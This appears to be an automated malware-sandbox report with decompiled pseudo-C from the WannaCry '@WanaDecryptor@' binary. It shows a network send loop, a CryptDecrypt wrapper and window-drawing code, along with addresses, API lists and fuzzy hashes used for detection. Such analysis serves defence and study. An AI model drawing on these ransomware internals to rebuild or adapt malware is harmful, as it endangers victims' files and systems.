					if(_t34 != 0) {
						__eflags = _a12;
						if(_a12 == 0) {
							_t36 = _a4;
							_v1040 = _t36;
							_t91 = _t36;
							goto L13;
						} else {
							__eflags = _a16;
							if(_a16 != 0) {
								__eflags = _t105 - 0x400;
								if(_t105 > 0x400) {
									_t49 = E00412A90(_t105);
									_t109 =  &(( &_v1040)[1]);
									_v1040 = _t49;
									__eflags = _t49;
									if(_t49 != 0) {
										_t103 = _a4;
										_t70 = _t105;
										_t71 = _t70 >> 2;
										memcpy(_t49, _t103, _t71 << 2);
										memcpy(_t103 + _t71 + _t71, _t103, _t70 & 0x00000003);
										_t106 =  &(_t109[6]);
										_t91 = _v1040;
										E0040D2B0(_t60, _t91, _t105);
										goto L13;
									} else {
										return _t49;
									}
								} else {
									_t104 = _a4;
									_t78 = _t105 >> 2;
									memcpy(_t104 + _t78 + _t78, _t104, memcpy( &_v1024, _t104, _t78 << 2) & 0x00000003);
									_t106 =  &(( &_v1040)[6]);
									_t83 =  &_v1024;
									_t91 = _t83;
									_v1040 = _t83;
									E0040D2B0(_t60, _t91, _t105);
									goto L13;
								}
							} else {
								_t91 = _a4;
								E0040D2B0(__ecx, _t91, _t105);
								L13:
								_push( &_v1028);
								L0041303E();
								_t37 = _v1028;
								_t107 =  &(_t106[1]);
								_t102 = 0;
								_v1036 = _t37;
								__eflags = _t105;
								if(_t105 > 0) {
									while(1) {
										__eflags = _t37 - _v1028 -  *((intOrPtr*)(_t60 + 0x28));
										if(_t37 - _v1028 >  *((intOrPtr*)(_t60 + 0x28))) {
											goto L25;
										}
										_t43 =  *((intOrPtr*)( *_t60 + 0x20))( *((intOrPtr*)(_t60 + 4)), _t91 + _t102, _t105 - _t102);
										__eflags = _t43;
										if(__eflags > 0) {
											_t102 = _t102 + _t43;
											__eflags = _t102;
											_push( &_v1048);
											goto L24;
										} else {
											if(__eflags != 0) {
												_t45 =  *((intOrPtr*)( *_t60 + 0x28))();
												__eflags = _t45 - 0x2733;
												if(_t45 == 0x2733) {
													_t46 = _v1044;
													__eflags = _t46 - 0x64;
													_v1044 = _t46 + 1;
													if(_t46 > 0x64) {
														Sleep(0x64);
														_v1044 = 0;
													}
													_push( &_v1048);
													L24:
													L0041303E();
													_t107 =  &(_t107[1]);
													__eflags = _t102 - _t105;
													if(_t102 < _t105) {
														_t37 = _v1048;
														continue;
													}
												}
											}
										}
										goto L25;
									}
								}
								L25:
								__eflags = _t91 - _a4;
								if(_t91 != _a4) {
									__eflags = _t91 -  &_v1024;
									if(_t91 !=  &_v1024) {
										__eflags = _t91;
										if(_t91 != 0) {
											free(_t91);
										}
									}
								}
								return _t102;
							}
						}
					} else {
						_t58 = _t34 | 0xffffffff;
						__eflags = _t58;
						return _t58;
					}
				} else {
					return 0;
				}
			}






























                                  0x0040d300
                                  0x0040d308
                                  0x0040d313
                                  0x0040d315
                                  0x0040d31d
                                  0x0040d330
                                  0x0040d335
                                  0x0040d337
                                  0x0040d350
                                  0x0040d352
                                  0x0040d3f6
                                  0x0040d3fd
                                  0x0040d401
                                  0x00000000
                                  0x0040d358
                                  0x0040d35f
                                  0x0040d361
                                  0x0040d378
                                  0x0040d37e
                                  0x0040d3b1
                                  0x0040d3b6
                                  0x0040d3b9
                                  0x0040d3bd
                                  0x0040d3bf
                                  0x0040d3ce
                                  0x0040d3d5
                                  0x0040d3db
                                  0x0040d3de
                                  0x0040d3e6
                                  0x0040d3e6
                                  0x0040d3e8
                                  0x0040d3ef
                                  0x00000000
                                  0x0040d3cb
                                  0x0040d3cb
                                  0x0040d3cb
                                  0x0040d380
                                  0x0040d380
                                  0x0040d38f
                                  0x0040d39a
                                  0x0040d39a
                                  0x0040d39c
                                  0x0040d3a0
                                  0x0040d3a2
                                  0x0040d3a9
                                  0x00000000
                                  0x0040d3a9
                                  0x0040d363
                                  0x0040d363
                                  0x0040d36e
                                  0x0040d403
                                  0x0040d407
                                  0x0040d408
                                  0x0040d40d
                                  0x0040d411
                                  0x0040d414
                                  0x0040d416
                                  0x0040d41a
                                  0x0040d41c
                                  0x0040d424
                                  0x0040d42d
                                  0x0040d42f
                                  0x00000000
                                  0x00000000
                                  0x0040d442
                                  0x0040d445
                                  0x0040d447
                                  0x0040d480
                                  0x0040d480
                                  0x0040d486
                                  0x00000000
                                  0x0040d449
                                  0x0040d449
                                  0x0040d44f
                                  0x0040d452
                                  0x0040d457
                                  0x0040d459
                                  0x0040d460
                                  0x0040d463
                                  0x0040d467
                                  0x0040d46b
                                  0x0040d471
                                  0x0040d471
                                  0x0040d47d
                                  0x0040d487
                                  0x0040d487
                                  0x0040d48c
                                  0x0040d48f
                                  0x0040d491
                                  0x0040d420
                                  0x00000000
                                  0x0040d420
                                  0x0040d491
                                  0x0040d457
                                  0x0040d449
                                  0x00000000
                                  0x0040d447
                                  0x0040d424
                                  0x0040d493
                                  0x0040d493
                                  0x0040d49a
                                  0x0040d4a0
                                  0x0040d4a2
                                  0x0040d4a4
                                  0x0040d4a6
                                  0x0040d4a9
                                  0x0040d4ae
                                  0x0040d4a6
                                  0x0040d4a2
                                  0x0040d4bd
                                  0x0040d4bd
                                  0x0040d361
                                  0x0040d33c
                                  0x0040d33c
                                  0x0040d33c
                                  0x0040d346
                                  0x0040d346
                                  0x0040d322
                                  0x0040d32b
                                  0x0040d32b

                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a08db869219df8efdefb3ef72c08157662442d75b338dd6e5398e89fc6f12503
                                  • Instruction ID: 8719850658187d05665d4daca0cd16b7f92190a52f2d7545724c4cd71ae93cac
                                  • Opcode Fuzzy Hash: a08db869219df8efdefb3ef72c08157662442d75b338dd6e5398e89fc6f12503
                                  • Instruction Fuzzy Hash: 7A41D7B2B042044BC724DE6898506BFB7D5EBD4314F40093FF946A3381DA79ED4D869A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404AF0 Relevance: 6.1, APIs: 4, Instructions: 51encryptionCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 76%
                                  			E00404AF0(void* __ecx, void* _a4, int _a8) {
				intOrPtr* _v4;
				void* _v8;
				signed int _v12;
				int _t12;
				void* _t19;
				signed int _t22;
				signed int _t23;
				struct _CRITICAL_SECTION* _t30;
				void* _t36;

				_t19 = __ecx;
				if( *((intOrPtr*)(__ecx + 8)) != 0) {
					_t2 = _t19 + 0x10; // 0x14
					_t30 = _t2;
					EnterCriticalSection(_t30);
					_t36 = _a4;
					_t12 = CryptDecrypt( *(_t19 + 8), 0, 1, 0, _t36,  &_a8);
					_push(_t30);
					if(_t12 != 0) {
						LeaveCriticalSection();
						_t22 = _v12;
						_t23 = _t22 >> 2;
						memcpy(_v8, _t36, _t23 << 2);
						 *_v4 = memcpy(_t36 + _t23 + _t23, _t36, _t22 & 0x00000003);
						return 1;
					} else {
						LeaveCriticalSection();
						return 0;
					}
				} else {
					return 0;
				}
			}












                                  0x00404af1
                                  0x00404afa
                                  0x00404b04
                                  0x00404b04
                                  0x00404b08
                                  0x00404b0e
                                  0x00404b22
                                  0x00404b2a
                                  0x00404b2b
                                  0x00404b3b
                                  0x00404b49
                                  0x00404b4d
                                  0x00404b50
                                  0x00404b60
                                  0x00404b67
                                  0x00404b2d
                                  0x00404b2d
                                  0x00404b38
                                  0x00404b38
                                  0x00404afe
                                  0x00404b01
                                  0x00404b01

                                  APIs
                                  • EnterCriticalSection.KERNEL32(00000014,00000000,00000000,00000000,0040234D,?,00000100,?,?), ref: 00404B08
                                  • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,?,?), ref: 00404B22
                                  • LeaveCriticalSection.KERNEL32(00000014), ref: 00404B2D
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CriticalSection$CryptDecryptEnterLeave
                                  • String ID:
                                  • API String ID: 1395129968-0
                                  • Opcode ID: d5df251600a2380ab54480b0f3f02b47ff305855cea17aa335da23d14111fa1b
                                  • Instruction ID: c9397fa3391ecaa6db63de0f595bcff8412a7be4ee2956e3e45acdf047351e7f
                                  • Opcode Fuzzy Hash: d5df251600a2380ab54480b0f3f02b47ff305855cea17aa335da23d14111fa1b
                                  • Instruction Fuzzy Hash: 15017C323002049BD714CE65E888BAB77A9FBC9721F44883AFA42D7281D7B0E809C671
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004090F0 Relevance: 56.5, APIs: 21, Strings: 11, Instructions: 454windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E004090F0(intOrPtr* __ecx, void* __fp0) {
				signed int _t226;
				signed int _t230;
				struct tagPOINT _t232;
				long _t233;
				signed int _t237;
				signed int _t242;
				intOrPtr _t246;
				intOrPtr* _t264;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int _t276;
				intOrPtr _t279;
				signed int _t282;
				intOrPtr* _t283;
				struct tagPOINT _t295;
				signed int _t311;
				signed int _t314;
				signed int** _t321;
				intOrPtr _t361;
				intOrPtr _t418;
				intOrPtr* _t429;
				signed int* _t433;
				long _t437;
				signed int _t438;
				intOrPtr* _t440;
				signed int _t441;
				intOrPtr _t442;
				void* _t443;

				_push(0xffffffff);
				_push(E0041414D);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t442;
				_t443 = _t442 - 0xc4;
				_t321 =  *(_t443 + 0xd8);
				_t226 = _t321[1];
				_t429 = __ecx;
				if((_t226 & 0x00000003) == 0) {
					L49:
					 *[fs:0x0] =  *((intOrPtr*)(_t443 + 0xd4));
					return _t226;
				}
				_t433 =  *_t321;
				 *(_t443 + 0x40) = _t226 & 0x00000004;
				 *(_t443 + 0x10) = 0;
				L00412DA6();
				_push(_t443 + 0x14);
				 *((intOrPtr*)(_t443 + 0xe0)) = 0;
				L00412DD6();
				_t230 = _t321[1] & 0x00000300;
				if(_t230 == 0x100) {
					if( *((intOrPtr*)( *(_t443 + 0x14) - 8)) == 0) {
						_push("%d%%");
						L00412DA0();
					}
					_t232 = _t321[7];
					 *((intOrPtr*)(_t443 + 0x28)) = _t321[6].x - _t232;
					asm("fild dword [esp+0x28]");
					 *((intOrPtr*)(_t443 + 0x28)) = _t321[8] - _t232;
					asm("fidiv dword [esp+0x28]");
					L0041304A();
					 *(_t443 + 0x10) = _t232;
				} else {
					if(_t230 == 0x200) {
						if( *((intOrPtr*)( *(_t443 + 0x14) - 8)) == 0) {
							_push("%d");
							L00412DA0();
						}
						 *(_t443 + 0x10) = _t321[6];
					}
				}
				_t226 =  *(_t443 + 0x14);
				if( *((intOrPtr*)(_t226 - 8)) == 0) {
					L48:
					 *(_t443 + 0xdc) = 0xffffffff;
					L00412CC2();
					goto L49;
				} else {
					_t233 = SendMessageA( *(_t429 + 0x20), 0x31, 0, 0);
					L00412DE2();
					_t437 = _t233;
					 *(_t443 + 0x54) = _t433;
					 *(_t443 + 0x50) = 0x416794;
					 *(_t443 + 0xdc) = 1;
					E00409DF0(_t443 + 0x58);
					 *(_t443 + 0x58) = 0x416780;
					 *((char*)(_t443 + 0xe0)) = 2;
					 *(_t443 + 0x64) = 0;
					 *(_t443 + 0x54) = 0x41677c;
					E00409870(_t443 + 0x54, _t437);
					 *(_t443 + 0x68) = _t433;
					 *((char*)(_t443 + 0xe0)) = 4;
					 *(_t443 + 0x70) = 0xffffffff;
					 *(_t443 + 0x68) = 0x416778;
					_t237 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x60)), _t233);
					 *(_t443 + 0x90) = _t237;
					 *(_t443 + 0x6c) = _t237;
					 *(_t443 + 0x88) = _t433;
					_push(1);
					 *((char*)(_t443 + 0xe0)) = 6;
					 *(_t443 + 0x90) = 0;
					 *(_t443 + 0x88) = 0x416774;
					L00412DC4();
					 *(_t443 + 0x70) = _t237;
					 *(_t443 + 0x8c) = _t237;
					 *(_t443 + 0x7c) = _t433;
					_push(0xe);
					 *((char*)(_t443 + 0xe0)) = 8;
					 *(_t443 + 0x84) = 0xffffffff;
					 *(_t443 + 0x7c) = 0x416770;
					L00413004();
					 *(_t443 + 0x74) = _t237;
					 *(_t443 + 0x80) = _t237;
					 *((char*)(_t443 + 0xe4)) = 9;
					GetWindowOrgEx(_t433[2], _t443 + 0x1c);
					 *(_t443 + 0x48) =  *(_t443 + 0x1c);
					 *(_t443 + 0x4c) =  *(_t443 + 0x20);
					L00412DA6();
					_push( *(_t443 + 0x10));
					_push( *(_t443 + 0x14));
					_push(_t443 + 0x1c);
					 *((char*)(_t443 + 0xe8)) = 0xa;
					L00412E00();
					_t443 = _t443 + 0xc;
					_t242 = 0;
					 *((intOrPtr*)(_t443 + 0x28)) = 0;
					if(_t437 != 0) {
						GetObjectA( *(_t437 + 4), 0x3c, _t443 + 0x98);
						_t242 = 0;
						 *((intOrPtr*)(_t443 + 0x28)) = (0x66666667 *  *(_t443 + 0xa0) >> 0x20 >> 2) + (0x66666667 *  *(_t443 + 0xa0) >> 0x20 >> 2 >> 0x1f);
					}
					 *(_t443 + 0x10) = _t242;
					 *(_t443 + 0x2c) = _t242;
					 *(_t443 + 0x24) = _t242;
					_t438 = 0;
					GetTextExtentPoint32A(_t433[2],  *(_t443 + 0x18),  *( *(_t443 + 0x18) - 8), _t443 + 0x1c);
					_t246 =  *((intOrPtr*)(_t443 + 0x28));
					if(_t246 != 0) {
						if(_t246 != 0x5a) {
							if(_t246 != 0xb4) {
								if(_t246 != 0x10e) {
									goto L21;
								}
								_t441 =  *(_t443 + 0x20);
								 *(_t443 + 0x10) = _t441;
								 *(_t443 + 0x2c) =  *(_t443 + 0x1c);
								_t438 =  ~_t441;
								L20:
								 *(_t443 + 0x24) = 0;
								goto L21;
							}
							_t311 =  *(_t443 + 0x20);
							 *(_t443 + 0x2c) = _t311;
							_t438 = 0;
							 *(_t443 + 0x10) =  *(_t443 + 0x1c);
							 *(_t443 + 0x24) =  ~_t311;
							goto L21;
						}
						_t438 =  *(_t443 + 0x20);
						 *(_t443 + 0x10) = _t438;
						 *(_t443 + 0x2c) =  *(_t443 + 0x1c);
						goto L20;
					} else {
						_t314 =  *(_t443 + 0x20);
						 *(_t443 + 0x10) =  *(_t443 + 0x1c);
						 *(_t443 + 0x2c) = _t314;
						 *(_t443 + 0x24) = _t314;
						L21:
						GetViewportOrgEx(_t433[2], _t443 + 0x1c);
						if((_t321[1] & 0x00000010) == 0) {
							asm("cdq");
							 *(_t443 + 0x44) =  *_t433;
							asm("cdq");
							 *((intOrPtr*)( *(_t443 + 0x48) + 0x40))(_t443 + 0x44, _t321[2] + (_t321[4] - _t321[2] + _t438 - _t321[2] >> 1), _t321[3] + (_t321[5] - _t321[3] +  *(_t443 + 0x24) -  *(_t443 + 0x24) >> 1));
							if( *((intOrPtr*)(_t429 + 0x60)) !=  *((intOrPtr*)(_t429 + 0x64))) {
								_t264 =  *((intOrPtr*)(_t443 + 0xec));
								if( *_t264 !=  *((intOrPtr*)(_t264 + 8))) {
									 *((intOrPtr*)( *_t429 + 0xcc))(_t321, _t264, _t443 + 0x1c, _t443 + 0x48);
								}
								_t440 =  *((intOrPtr*)(_t443 + 0xe8));
								if( *((intOrPtr*)(_t440 + 8)) >  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8))) {
									_t282 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x64)));
									if( *(_t443 + 0x90) == 0xffffffff) {
										 *(_t443 + 0x6c) = _t282;
									}
									_t283 = _t440;
									 *((intOrPtr*)(_t443 + 0x30)) =  *_t283;
									 *((intOrPtr*)(_t443 + 0x34)) =  *((intOrPtr*)(_t283 + 4));
									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)(_t283 + 8));
									 *((intOrPtr*)(_t443 + 0x3c)) =  *((intOrPtr*)(_t283 + 0xc));
									 *((intOrPtr*)(_t443 + 0x30)) =  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8));
									 *((intOrPtr*)( *_t429 + 0xcc))(_t321, _t443 + 0x34, _t443 + 0x1c, _t443 + 0x48);
								}
								if( *_t440 >=  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))))) {
									L39:
									 *((intOrPtr*)( *_t433 + 0x40))(_t443 + 0x20,  *(_t443 + 0x1c),  *(_t443 + 0x20));
									 *(_t443 + 0xdc) = 9;
									L00412CC2();
									 *(_t443 + 0x78) = 0x416770;
									_t269 =  *(_t443 + 0x74);
									 *(_t443 + 0xdc) = 0xb;
									if(_t269 != 0xffffffff) {
										_push(_t269);
										L00413004();
									}
									 *(_t443 + 0x84) = 0x416774;
									_t270 =  *(_t443 + 0x70);
									 *(_t443 + 0xdc) = 0xc;
									if(_t270 != 0) {
										_push(_t270);
										L00412DC4();
									}
									 *(_t443 + 0x64) = 0x416778;
									_t271 =  *(_t443 + 0x6c);
									 *(_t443 + 0xdc) = 0xd;
									if(_t271 != 0xffffffff) {
										 *((intOrPtr*)( *_t433 + 0x38))(_t271);
									}
									 *(_t443 + 0x50) = 0x41677c;
									_t272 =  *(_t443 + 0x60);
									 *(_t443 + 0xdc) = 0xf;
									if(_t272 != 0) {
										 *((intOrPtr*)( *( *(_t443 + 0x54)) + 0x30))(_t272);
									}
									 *(_t443 + 0x60) = 0;
									L00412D52();
									_t226 = _t443 + 0x58;
									 *(_t443 + 0x58) = 0x415c00;
									 *(_t443 + 0x70) = _t226;
									 *(_t443 + 0xdc) = 0x10;
									L00412D52();
									 *(_t443 + 0x58) = 0x415bec;
									 *(_t443 + 0x50) = 0x416794;
									goto L48;
								} else {
									_t276 =  *((intOrPtr*)( *_t433 + 0x38))( *((intOrPtr*)(_t429 + 0x64)));
									if( *(_t443 + 0x6c) == 0xffffffff) {
										 *(_t443 + 0x6c) = _t276;
									}
									 *((intOrPtr*)(_t443 + 0x34)) =  *((intOrPtr*)(_t440 + 4));
									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)(_t440 + 8));
									 *((intOrPtr*)(_t443 + 0x30)) =  *_t440;
									 *((intOrPtr*)(_t443 + 0x38)) =  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))));
									 *((intOrPtr*)(_t443 + 0x3c)) =  *((intOrPtr*)(_t440 + 0xc));
									_t279 =  *_t429;
									_push(_t443 + 0x48);
									_push(_t443 + 0x18);
									_t361 = _t443 + 0x38;
									L38:
									 *((intOrPtr*)(_t279 + 0xcc))(_t321, _t361);
									goto L39;
								}
							}
							 *((intOrPtr*)( *_t429 + 0xcc))(_t321,  *((intOrPtr*)(_t443 + 0xec)), _t443 + 0x1c, _t443 + 0x48);
							goto L39;
						}
						E00409D40(_t443 + 0x30, _t321,  *((intOrPtr*)(_t443 + 0xec)));
						_t295 =  *(_t443 + 0x2c);
						if( *(_t443 + 0x40) == 0) {
							_t295 =  *(_t443 + 0x10);
						}
						if(_t295 >  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec)) + 8)) -  *((intOrPtr*)( *((intOrPtr*)(_t443 + 0xec))))) {
							goto L39;
						} else {
							asm("cdq");
							_t418 =  *((intOrPtr*)(_t443 + 0x34));
							 *(_t443 + 0x40) =  *_t433;
							asm("cdq");
							 *((intOrPtr*)( *(_t443 + 0x44) + 0x40))(_t443 + 0x98, ( *((intOrPtr*)(_t443 + 0x3c)) -  *((intOrPtr*)(_t443 + 0x30)) + _t438 - _t418 >> 1) +  *((intOrPtr*)(_t443 + 0x30)), ( *((intOrPtr*)(_t443 + 0x3c)) -  *((intOrPtr*)(_t443 + 0x34)) +  *(_t443 + 0x24) -  *(_t443 + 0x24) >> 1) + _t418);
							_t279 =  *_t429;
							_push(_t443 + 0x48);
							_t361 =  *((intOrPtr*)(_t443 + 0xf0));
							_push(_t443 + 0x18);
							goto L38;
						}
					}
				}
			}

































                                  0x004090f6
                                  0x004090f8
                                  0x004090fd
                                  0x004090fe
                                  0x00409105
                                  0x0040910c
                                  0x00409115
                                  0x0040911c
                                  0x0040911e
                                  0x0040971e
                                  0x00409729
                                  0x00409736
                                  0x00409736
                                  0x00409124
                                  0x0040912f
                                  0x00409133
                                  0x00409137
                                  0x00409142
                                  0x00409143
                                  0x0040914a
                                  0x00409152
                                  0x0040915c
                                  0x0040918c
                                  0x0040918e
                                  0x00409197
                                  0x00409197
                                  0x0040919c
                                  0x004091a7
                                  0x004091ad
                                  0x004091b1
                                  0x004091bb
                                  0x004091bf
                                  0x004091c4
                                  0x0040915e
                                  0x00409163
                                  0x0040916c
                                  0x0040916e
                                  0x00409177
                                  0x00409177
                                  0x0040917f
                                  0x0040917f
                                  0x00409163
                                  0x004091c8
                                  0x004091cf
                                  0x0040970a
                                  0x0040970e
                                  0x00409719
                                  0x00000000
                                  0x004091d5
                                  0x004091dd
                                  0x004091e4
                                  0x004091e9
                                  0x004091eb
                                  0x004091ef
                                  0x004091fb
                                  0x00409203
                                  0x00409208
                                  0x00409215
                                  0x0040921d
                                  0x00409225
                                  0x0040922d
                                  0x00409235
                                  0x0040923e
                                  0x00409246
                                  0x0040924e
                                  0x00409256
                                  0x00409259
                                  0x00409260
                                  0x00409264
                                  0x0040926b
                                  0x0040926f
                                  0x00409277
                                  0x00409282
                                  0x0040928d
                                  0x00409292
                                  0x00409296
                                  0x0040929d
                                  0x004092a1
                                  0x004092a5
                                  0x004092ad
                                  0x004092b8
                                  0x004092c0
                                  0x004092c5
                                  0x004092c9
                                  0x004092d9
                                  0x004092e1
                                  0x004092f3
                                  0x004092f7
                                  0x004092fb
                                  0x00409308
                                  0x0040930d
                                  0x0040930e
                                  0x0040930f
                                  0x00409317
                                  0x0040931c
                                  0x0040931f
                                  0x00409323
                                  0x00409327
                                  0x00409337
                                  0x00409355
                                  0x00409357
                                  0x00409357
                                  0x0040935b
                                  0x0040935f
                                  0x00409363
                                  0x0040936f
                                  0x0040937b
                                  0x00409381
                                  0x00409389
                                  0x004093a4
                                  0x004093bd
                                  0x004093de
                                  0x00000000
                                  0x00000000
                                  0x004093e0
                                  0x004093e8
                                  0x004093ec
                                  0x004093f0
                                  0x004093f2
                                  0x004093f2
                                  0x00000000
                                  0x004093f2
                                  0x004093bf
                                  0x004093c7
                                  0x004093cb
                                  0x004093cf
                                  0x004093d3
                                  0x00000000
                                  0x004093d3
                                  0x004093a6
                                  0x004093ae
                                  0x004093b2
                                  0x00000000
                                  0x0040938b
                                  0x0040938f
                                  0x00409393
                                  0x00409397
                                  0x0040939b
                                  0x004093f6
                                  0x004093ff
                                  0x0040940b
                                  0x004094b9
                                  0x004094cc
                                  0x004094d5
                                  0x004094e8
                                  0x004094f3
                                  0x00409517
                                  0x00409525
                                  0x00409537
                                  0x00409537
                                  0x0040953d
                                  0x00409553
                                  0x0040955d
                                  0x00409568
                                  0x0040956a
                                  0x0040956a
                                  0x0040956e
                                  0x00409572
                                  0x00409579
                                  0x00409580
                                  0x0040958e
                                  0x0040959b
                                  0x004095ad
                                  0x004095ad
                                  0x004095bf
                                  0x0040961a
                                  0x0040962d
                                  0x00409634
                                  0x0040963c
                                  0x00409641
                                  0x00409649
                                  0x0040964d
                                  0x00409658
                                  0x0040965a
                                  0x0040965d
                                  0x0040965d
                                  0x00409662
                                  0x0040966d
                                  0x00409671
                                  0x0040967b
                                  0x0040967d
                                  0x00409680
                                  0x00409680
                                  0x00409685
                                  0x0040968d
                                  0x00409691
                                  0x0040969c
                                  0x004096a3
                                  0x004096a3
                                  0x004096a6
                                  0x004096ae
                                  0x004096b2
                                  0x004096bc
                                  0x004096c5
                                  0x004096c5
                                  0x004096cc
                                  0x004096d4
                                  0x004096d9
                                  0x004096dd
                                  0x004096e5
                                  0x004096ed
                                  0x004096f5
                                  0x004096fa
                                  0x00409702
                                  0x00000000
                                  0x004095c1
                                  0x004095c9
                                  0x004095d1
                                  0x004095d3
                                  0x004095d3
                                  0x004095e0
                                  0x004095eb
                                  0x004095ef
                                  0x004095fc
                                  0x00409604
                                  0x00409608
                                  0x0040960a
                                  0x0040960b
                                  0x0040960c
                                  0x00409610
                                  0x00409614
                                  0x00000000
                                  0x00409614
                                  0x004095bf
                                  0x0040950c
                                  0x00000000
                                  0x0040950c
                                  0x00409421
                                  0x0040942c
                                  0x00409430
                                  0x00409432
                                  0x00409432
                                  0x00409444
                                  0x00000000
                                  0x0040944a
                                  0x0040945c
                                  0x0040945f
                                  0x00409467
                                  0x00409478
                                  0x0040948e
                                  0x00409491
                                  0x0040949b
                                  0x0040949c
                                  0x004094a3
                                  0x00000000
                                  0x004094a3
                                  0x00409444
                                  0x00409389

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2414#540#5875#6170#800#860$#2818#2860#3874ExtentMessageObjectPoint32SendTextViewportWindow_ftol
                                  • String ID: %d%%$gfff$pgA$pgA$tgA$tgA$xgA$xgA$|gA$|gA$[A
                                  • API String ID: 2923375784-3599407550
                                  • Opcode ID: 4537b4b5c38f08034835ba6f49b0df8f11378c8c8d7c7bac32dddfd5d0061b5a
                                  • Instruction ID: e7c60e05cab477c723c52aa9b6021990c4bcf2d63edfa6d200c8e4e6b3644932
                                  • Opcode Fuzzy Hash: 4537b4b5c38f08034835ba6f49b0df8f11378c8c8d7c7bac32dddfd5d0061b5a
                                  • Instruction Fuzzy Hash: D312E2B0208381DFD714CF69C484A9BBBE5BBC8304F148A2EF89997391D774E945CB66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00405230 Relevance: 49.8, APIs: 33, Instructions: 279COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 72%
                                  			E00405230(void* __ecx) {
				RECT* _v12;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				intOrPtr _v44;
				char _v48;
				char _v52;
				void* _v56;
				void* _v60;
				void* _v64;
				void* _v68;
				int _t98;
				int _t99;
				int _t104;
				char* _t106;
				void* _t109;
				char* _t110;
				signed int _t113;
				int _t114;
				void* _t117;
				char* _t118;
				char _t119;
				char* _t120;
				signed int _t122;
				void* _t123;
				int _t126;
				int _t127;
				int _t130;
				void* _t132;
				signed int _t136;
				signed int _t142;
				intOrPtr _t163;
				intOrPtr _t179;
				signed int _t182;
				signed int _t198;
				void* _t199;
				signed int _t200;
				void* _t201;
				intOrPtr* _t205;
				void* _t208;
				intOrPtr* _t212;
				intOrPtr* _t213;
				intOrPtr _t215;

				_push(0xffffffff);
				_push(E00413918);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t215;
				_t208 = __ecx;
				_t182 =  *(__ecx + 0x70);
				if(_t182 != 1) {
					if(__eflags <= 0) {
						L33:
						_t98 = InvalidateRect( *(_t208 + 0x20), 0, 1);
						L34:
						 *[fs:0x0] = _v12;
						return _t98;
					}
					__eflags =  *((char*)(__ecx + 0x4b)) - 1;
					if( *((char*)(__ecx + 0x4b)) != 1) {
						L15:
						_t99 =  *(_t208 + 0x78);
						__eflags = _t99 - 3;
						if(_t99 != 3) {
							__eflags = _t99 - 2;
							if(_t99 != 2) {
								__eflags = _t99;
								if(_t99 != 0) {
									__eflags = _t99 - 1;
									if(_t99 != 1) {
										goto L33;
									}
									_t212 = _t208 + 0x44;
									_t198 =  *( *((intOrPtr*)(_t208 + 0x44)) - 8);
									_t136 =  *(_t208 + 0x74);
									asm("cdq");
									_t98 = _t198 / _t136;
